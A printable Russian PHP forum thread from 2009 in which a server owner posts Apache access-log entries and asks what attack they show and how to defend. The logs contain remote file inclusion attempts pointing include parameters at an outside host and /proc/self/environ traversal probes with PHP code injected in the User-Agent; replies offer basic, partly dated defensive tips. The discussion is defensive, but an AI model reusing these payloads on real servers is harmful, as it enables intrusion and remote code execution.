Версия для печати темы
Нажмите сюда для просмотра этой темы в оригинальном формате
Форум программистов > PHP: Общие вопросы > какую дырку пытаются использовать


Автор: tcg2 26.5.2009, 10:23
Обнаружил сомнительные строки в логах apach'a, но честно говоря с механизмов ч/з php взлома слабо знаком, поэтому решил поспрашивать насколько ето сериозно и как защитится [OC CentOS 5.3 apache 2.2.3 php 5.1.6] ?

Код

/var/log/httpd/access_log.3:62.149.163.198 - - [23/May/2009:09:29:46 +0400] "GET /manual/mod//includes/messages.inc.php?include_path=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
/var/log/httpd/access_log.3:62.149.163.198 - - [23/May/2009:09:29:46 +0400] "GET //includes/messages.inc.php?include_path=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 304 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
/var/log/httpd/access_log.3:62.149.163.198 - - [23/May/2009:09:29:46 +0400] "GET /manual//includes/messages.inc.php?include_path=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
/var/log/httpd/access_log.3:62.149.163.198 - - [23/May/2009:09:29:46 +0400] "GET /manual/mod//includes/messages.inc.php?include_path=../../../../../../.. /../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 316 "-" "XXX<? echo \"w0000t\"; ?>XXX"
/var/log/httpd/access_log.3:62.149.163.198 - - [23/May/2009:09:29:46 +0400] "GET /manual//includes/messages.inc.php?include_path=../../../../../../../../ ../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 312 "-" "XXX<? echo \"w0000t\"; ?>XXX"
/var/log/httpd/access_log.3:62.149.163.198 - - [23/May/2009:09:29:46 +0400] "GET //includes/messages.inc.php?include_path=../../../../../../../../../../. ./../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 304 "-" "XXX<? echo \"w0000t\"; ?>XXX"
/var/log/httpd/access_log.3:62.149.163.198 - - [23/May/2009:09:29:47 +0400] "GET /manual/mod//includes/messages.inc.php?include_path=../../../../../../.. /../../../../../../../../../../../../../../../../../proc/self/environ%00  HTTP/1.1" 404 316 "-" "XXX<? echo \"w0000t\"; ?>XXX"
/var/log/httpd/access_log.3:62.149.163.198 - - [23/May/2009:09:29:47 +0400] "GET //includes/messages.inc.php?include_path=../../../../../../../../../../. ./../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-" "XXX<? echo \"w0000t\"; ?>XXX"
/var/log/httpd/access_log.3:62.149.163.198 - - [23/May/2009:09:29:47 +0400] "GET /manual//includes/messages.inc.php?include_path=../../../../../../../../ ../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "XXX<? echo \"w0000t\"; ?>XXX"
 
/var/log/httpd/access_log.3:79.165.160.223 - - [23/May/2009:23:44:10 +0400] "GET /engine/modules/antibot.php HTTP/1.1" 404 300 "-" "-"
 
/var/log/httpd/access_log.3:62.149.163.198 - - [23/May/2009:09:29:46 +0400] "GET /manual/mod/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 300 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
/var/log/httpd/access_log.3:62.149.163.198 - - [23/May/2009:09:29:46 +0400] "GET /manual/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 296 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
/var/log/httpd/access_log.3:62.149.163.198 - - [23/May/2009:09:29:46 +0400] "GET /errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 289 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
/var/log/httpd/access_log.5:218.1.64.133 - - [21/May/2009:14:20:24 +0400] "GET /manual/en/mod/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 299 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
/var/log/httpd/access_log.5:218.1.64.133 - - [21/May/2009:14:20:27 +0400] "GET /errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
/var/log/httpd/access_log.5:218.1.64.133 - - [21/May/2009:14:20:28 +0400] "GET /manual/en/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
 
/var/log/httpd/access_log.3:62.149.163.198 - - [23/May/2009:09:29:46 +0400] "GET /manual//includes/messages.inc.php?include_path=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
/var/log/httpd/access_log.3:62.149.163.198 - - [23/May/2009:09:29:46 +0400] "GET /manual//includes/messages.inc.php?include_path=../../../../../../../../ ../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 312 "-" "XXX<? echo \"w0000t\"; ?>XXX"
/var/log/httpd/access_log.3:62.149.163.198 - - [23/May/2009:09:29:47 +0400] "GET /manual//includes/messages.inc.php?include_path=../../../../../../../../ ../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "XXX<? echo \"w0000t\"; ?>XXX"
 
/var/log/httpd/access_log.3:62.149.163.198 - - [23/May/2009:09:29:46 +0400] "GET /manual/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 296 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
 
/var/log/httpd/access_log.3:62.149.163.198 - - [23/May/2009:09:29:46 +0400] "GET /manual/mod//includes/messages.inc.php?include_path=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
/var/log/httpd/access_log.3:62.149.163.198 - - [23/May/2009:09:29:46 +0400] "GET /manual/mod//includes/messages.inc.php?include_path=../../../../../../.. /../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 316 "-" "XXX<? echo \"w0000t\"; ?>XXX"
/var/log/httpd/access_log.3:62.149.163.198 - - [23/May/2009:09:29:47 +0400] "GET /manual/mod//includes/messages.inc.php?include_path=../../../../../../.. /../../../../../../../../../../../../../../../../../proc/self/environ%00  HTTP/1.1" 404 316 "-" "XXX<? echo \"w0000t\"; ?>XXX"

Автор: MoLeX 26.5.2009, 10:41
движок самописный или публичный?

Автор: tcg2 26.5.2009, 11:00
самописный

Автор: MoLeX 26.5.2009, 11:39
можно сделать хотя бы так

index.php
Код

<?php
define('KEY', 'true');
?>



/manual/mod/includes/messages.inc.php
Код

<?php if(!defined('KEY')) {exit();}

/**/

?>


проверять что пришло от юзера и т.д.

Добавлено через 1 минуту и 51 секунду
использовать ф-цию mysql_escape_string() в работе с СУБД

Автор: gta4kv 26.5.2009, 12:02
MoLeX, вот чё ты бред пишешь. О другом спрашивают.


tcg2, пытаются подключить файл. (т.е проверяют считай что ты инклюдишь путь прям из переменной или как)

Автор: MoLeX 26.5.2009, 12:11
Цитата(tcg2 @  26.5.2009,  10:23 Найти цитируемый пост)
как защитится


Цитата(gta4kv @  26.5.2009,  12:02 Найти цитируемый пост)
MoLeX, вот чё ты бред пишешь. О другом спрашивают.

 smile 

Автор: gta4kv 26.5.2009, 12:58
тьфу ты блин, опять я посты не полностью читаю

Автор: MoLeX 26.5.2009, 12:59
gta4kv, вот то-то...

Автор: tcg2 26.5.2009, 13:15
Хорошо спасибо за рекомендации!!..А если движок не самописный, в чем же разница?

Автор: MoLeX 26.5.2009, 13:20
Цитата(tcg2 @  26.5.2009,  13:15 Найти цитируемый пост)
А если движок не самописный, в чем же разница?

если публичный то скорей всего для него есть патчи которые надо установить))) вот и все...

Автор: SoWa 26.5.2009, 13:21
В не-самописных движках защита от такой ерунды есть. Молекс написал тебе рекомендацию, как защитить твое творение от подобных действий над твоим детищем.

Автор: bars80080 26.5.2009, 14:06
Цитата(SoWa @  26.5.2009,  13:21 Найти цитируемый пост)
Молекс написал тебе рекомендацию, как защитить твое творение от подобных действий над твоим детищем. 

я вообще, насколько понимаю, пытаются подключить некие другие файлы. непосредственно базовые файлы всего сервера

или допустим, что-то загруженное на сервер. 
tcg2, у тебя есть модуль загрузки на сервер чего-то? к примеру, фоток в галлерею?

как же решение Молекса поспособствует защите от подключения загруженных файлов?

Автор: youri 26.5.2009, 14:29
может проверяют, установлен ли у тебя phpauction, чтобы воспользоваться какой-нибудь его уязвимостью... в нем есть includes/messages.inc.php smile
хотя утверждать, конечно, ничего не могу

Powered by Invision Power Board (http://www.invisionboard.com)
© Invision Power Services (http://www.invisionpower.com)